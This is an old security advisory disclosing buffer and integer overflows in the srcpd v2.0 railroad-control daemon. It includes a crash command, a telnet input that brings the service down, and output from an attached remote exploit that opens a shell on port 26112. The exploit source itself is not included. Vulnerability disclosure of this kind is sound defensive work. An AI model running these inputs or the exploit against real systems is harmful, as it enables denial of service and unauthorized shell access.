/*********************************************** * * m00 security advistory #001 * * Buffer overflows in Srcpd v2.0 * * www.m00security.org * * overg[at]mail.ru h0snp[at]mail.ru * ************************************************/ --------------------------------------- Product: srcpd Version: 2.0 (other ?) OffSite: http://srcpd.sourceforge.net Problem: buffer & integer overflows. --------------------------------------- Vulnerability file: /usr/sbin/srcpd Description the package: The srcpd is a server daemon that enables you to control and play with a digital model railroad using any SRCP Client. Actually it supports an Intellibox (tm), a Marklin Interface 6050 or 6051 (tm?), and many more interfaces. More information about SRCP and links to many really cool clients (and other servers for different hardware) can be found at http://srcpd.sourceforge.net and http://www.der-moba.de/Digital This is a beta release, do not use for production! SRCP - Simple Railroad Command Protocol. 1. Local buffer overflow. In File srcpd.c length 'conffile' = MAXPATHLEN. If 'conffile' > MAXPATHLEN then srcpd is 'crashed'. [over@localhost m00]$ /usr/sbin/srcpd -f `perl -e 'print "A" x 10000'` Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 1024 (LWP 1197)] 0x420d2a44 in _getopt_internal () from /lib/i686/libc.so.6 2. Remote integer overflow. [over@localhost m00]$ telnet localhost 12340 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. srcpd V2; SRCP 0.8.2 go 11111111 1060333759.411 200 OK GO 1 go 11111111 Connection closed by foreign host. [over@localhost m00]$ telnet localhost 12340 Trying 127.0.0.1... telnet: connect to address 127.0.0.1: Connection refused 3. Remote stack overflow/command execution. There are multiply stack overflow vulnerabilities in method handlers. For example, handleSET() , handleGET() and other. Therefore we can smash the stack and get a shell. See code for more info... Remote exploit attached. example: [h0snp@h0m3 srcpd]$ ./m00-srcpd -h localhost -t 0 ** ***************************************** ** ** Srcpd v2.0 remote exploit by m00 Security ** ** ***************************************** ** Conneting...OK using RET = 0xbf1fcb61 now, if you was lucky with ret, shell spawned on 26112. [h0snp@h0m3 srcpd]$ telnet localhost 26112 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. id; uid=500(h0snp) gid=500(h0snp) groups=500(h0snp) (c) m00 Security / Over_G & h0snp
Attachment:
m00-srcpd.c
Description: Binary data
